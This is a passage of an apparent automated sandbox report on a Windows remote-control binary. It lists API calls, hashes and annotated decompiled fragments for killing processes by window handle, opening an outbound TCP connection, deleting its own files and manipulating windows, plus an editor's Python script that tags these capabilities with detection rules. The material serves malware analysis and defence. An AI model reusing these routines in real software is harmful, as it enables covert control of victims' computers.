                                  • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                  • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000,00409B39,6B03CB60), ref: 00412B5E
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00412B7E
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                  • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleV?$allocator@$??0?$basic_string@FileG@1@@G@2@@std@@G@std@@ModuleNameOpenProcessU?$char_traits@
                                  • String ID:
                                  • API String ID: 788797586-0
                                  • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                  • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1622488342-0
                                  • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                  • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                  • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • closesocket.WS2_32(00000000), ref: 0040256A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                  • String ID:
                                  • API String ID: 3330461409-0
                                  • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                  • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                  • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0040D817(void* __eflags) {
                                  				char* _t8;
                                  				void* _t25;
                                  
                                  				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);          // builds a std::string from the received command data (the trailing 0 looks like a field index; inferred)
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);   // the field is an HWND in decimal; resolve the owning PID into [ebp-0x2c]
                                  				E004126BC( *(_t25 - 0x2c));                          // OpenProcess(PROCESS_TERMINATE = 0x1, FALSE, pid) -> TerminateProcess -> CloseHandle
                                  				E0040EBBE();                                         // EnumWindows(callback 0x0040EA96) plus string bookkeeping: refreshes the window list after the kill
                                  				E004017DD(_t25 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();   // destroy temporaries; epilogue at 0x0040E6A4 is shared with the other command handlers
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}
                                  
                                  Instruction addresses: 0x0040d820, 0x0040d827, 0x0040d836, 0x0040d83f, 0x0040e51b, 0x0040e6a4, 0x0040e6ac, 0x0040e6b5, 0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                  • atoi.MSVCRT ref: 0040D82E
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                    • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                    • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                    • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                  • String ID:
                                  • API String ID: 2919580351-0
                                  • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                  • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                  • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%
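The listings above share one line format: the window-handle kill at 0040D817 (OpenProcess/TerminateProcess inside subcall 004126BC), the connect routine at 00402530 with send in subcall 00402440, and the OpenProcess(0x410) + GetModuleFileNameExW walker at 00412B5E. The following Python is an added example written for this page, not part of the Joe Sandbox report or of the analysed sample: it parses that "• API.MODULE(args), ref: ADDR" format, decodes the OpenProcess access mask and the socket() type/protocol arguments against documented Win32 values, and tags each function with the capability its call set implies. The three listings embedded in the block are copied from this report; the rule labels, function names and constant tables are the editor's own.

```python
"""Tag the "APIs" listings of this report with the capability each call set implies.

Added example for this page (editor's code, not part of the sandbox report or of
the analysed sample).  It understands the line format used above:
    • API.MODULE(arg,arg,...), ref: ADDRESS
    • Part of subcall function ADDRESS: API.MODULE(...), ref: ADDRESS
The listings embedded below are copied from this report; the rule names,
function names and the Win32 constant tables are the editor's own."""
import re

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Documented Win32 values used to decode OpenProcess / socket arguments.
PROCESS_RIGHTS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
SOCK_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
IP_PROTOS = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

# A function (subcalls included) that calls every API in a set gets the label.
CAPABILITY_RULES = [
    ("kill process by window handle", {"GetWindowThreadProcessId", "OpenProcess", "TerminateProcess"}),
    ("process image enumeration", {"OpenProcess", "GetModuleFileNameExW"}),
    ("outbound TCP session", {"socket", "connect", "send"}),
    ("self-removal (file + directory)", {"DeleteFileW", "RemoveDirectoryW"}),
]


def parse_listing(text):
    """Return one (api, module, args, ref, subcall) tuple per API line."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append((m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def _hex(s):
    """Report arguments are 8-digit hex, or '?' when the value was not recovered."""
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", s) else None


def decode_access(mask):
    names = [n for bit, n in PROCESS_RIGHTS.items() if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHTS)
    return names + ([hex(unknown)] if unknown else [])


def open_process_rights(calls):
    """(ref, [rights]) for every OpenProcess whose access mask was recovered."""
    return [(ref, decode_access(_hex(args[0])))
            for api, _, args, ref, _ in calls
            if api == "OpenProcess" and args and _hex(args[0]) is not None]


def socket_params(calls):
    """(ref, type, protocol) per socket() call.  The first argument is shown as
    00000000 in this report; AF_UNSPEC is not valid for socket(), so it is treated
    as unrecovered and only type and protocol are decoded."""
    out = []
    for api, _, args, ref, _ in calls:
        if api == "socket" and len(args) == 3 and None not in (_hex(args[1]), _hex(args[2])):
            out.append((ref, SOCK_TYPES.get(_hex(args[1]), args[1]),
                        IP_PROTOS.get(_hex(args[2]), args[2])))
    return out


def classify(calls):
    apis = {api for api, *_ in calls}
    return [name for name, needed in CAPABILITY_RULES if needed <= apis]


def summarize(text):
    calls = parse_listing(text)
    return {"calls": len(calls), "capabilities": classify(calls),
            "open_process": open_process_rights(calls), "sockets": socket_params(calls)}


# Listings copied from this report: function 0040D817, the connect routine at
# 00402530 and the process walker at 00412B5E.
KILL_LISTING = """\
• ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
• atoi.MSVCRT ref: 0040D82E
• GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
  • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
  • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
  • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
"""
NET_LISTING = """\
• socket.WS2_32(00000000,00000001,00000006), ref: 00402530
• connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
  • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
• closesocket.WS2_32(00000000), ref: 0040256A
"""
ENUM_LISTING = """\
• OpenProcess.KERNEL32(00000410,00000000,00409B39,6B03CB60), ref: 00412B5E
• GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00412B7E
• CloseHandle.KERNEL32(00000000), ref: 00412B89
"""

if __name__ == "__main__":
    for name, listing in (("0040D817", KILL_LISTING), ("00402530", NET_LISTING), ("00412B5E", ENUM_LISTING)):
        print(name, summarize(listing))
```

Run over the three embedded listings, summarize() labels 0040D817 as "kill process by window handle" with OpenProcess decoded to PROCESS_TERMINATE, 00402530 as an "outbound TCP session" (SOCK_STREAM/IPPROTO_TCP), and 00412B5E as "process image enumeration" with 0x410 decoded to PROCESS_VM_READ | PROCESS_QUERY_INFORMATION. The rules key only on API names, so a listing that reaches TerminateProcess through a different subcall chain still matches; arguments shown as "?" are skipped rather than guessed.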

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                  • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,6B015DF8), ref: 00412140
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                  • String ID:
                                  • API String ID: 758954411-0
                                  • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                  • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                  • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                  • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                  • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                  • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E00406CFF(WCHAR* __eax, void* __ecx) {
                                  				WCHAR* _t5;
                                  				signed int _t8;
                                  				signed int _t9;
                                  				void* _t15;
                                  
                                  				_t15 = __ecx;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();   // wide path string (the global at 0x0041B900 per the APIs below)
                                  				_t5 = DeleteFileW(__eax);
                                  				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;        // return value: whether DeleteFileW succeeded
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);   // wstring at this+0x64 == literal at 0x415800
                                  				if(_t5 != 0) {                                      // _t5 is eax: this tests the operator== result, not DeleteFileW
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					RemoveDirectoryW(_t5);                          // remove the directory as well (RemoveDirectoryW only succeeds on an empty directory)
                                  				}
                                  				return _t9;
                                  			}
                                  
                                  Instruction addresses: 0x00406d01, 0x00406d06, 0x00406d0d, 0x00406d15, 0x00406d21, 0x00406d2b, 0x00406d2f, 0x00406d36, 0x00406d36, 0x00406d40

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                  • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                  • String ID:
                                  • API String ID: 1823182134-0
                                  • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                  • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E0040D7E4(void* __eflags) {
                                  				char* _t5;
                                  				void* _t19;
                                  
                                  				_t5 = E0040180C(_t19 - 0x10, __eflags, 0);          // std::string built from the received command data (same helper as 0040D817)
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				CloseWindow(atoi(_t5));                              // HWND given in decimal; CloseWindow minimises the window, it does not destroy it
                                  				E004017DD(_t19 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();   // shared epilogue at 0x0040E6A4
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}
                                  
                                  Instruction addresses: 0x0040d7e9, 0x0040d7f0, 0x0040d7ff, 0x0040e6a4, 0x0040e6ac, 0x0040e6b5, 0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7F0
                                  • atoi.MSVCRT ref: 0040D7F7
                                  • CloseWindow.USER32 ref: 0040D7FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                  • String ID:
                                  • API String ID: 14144500-0
                                  • Opcode ID: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                  • Instruction ID: fbc29b80efd9e4125448cee2552d84d25da0c547aa8720e2220b6587ca76b5c9
                                  • Opcode Fuzzy Hash: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                  • Instruction Fuzzy Hash: 26E0E532910518CBDB04ABF1EC5DAEDB734FB90316B00883AE012E30E0EF785945CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1976170855-0
                                  • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                  • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
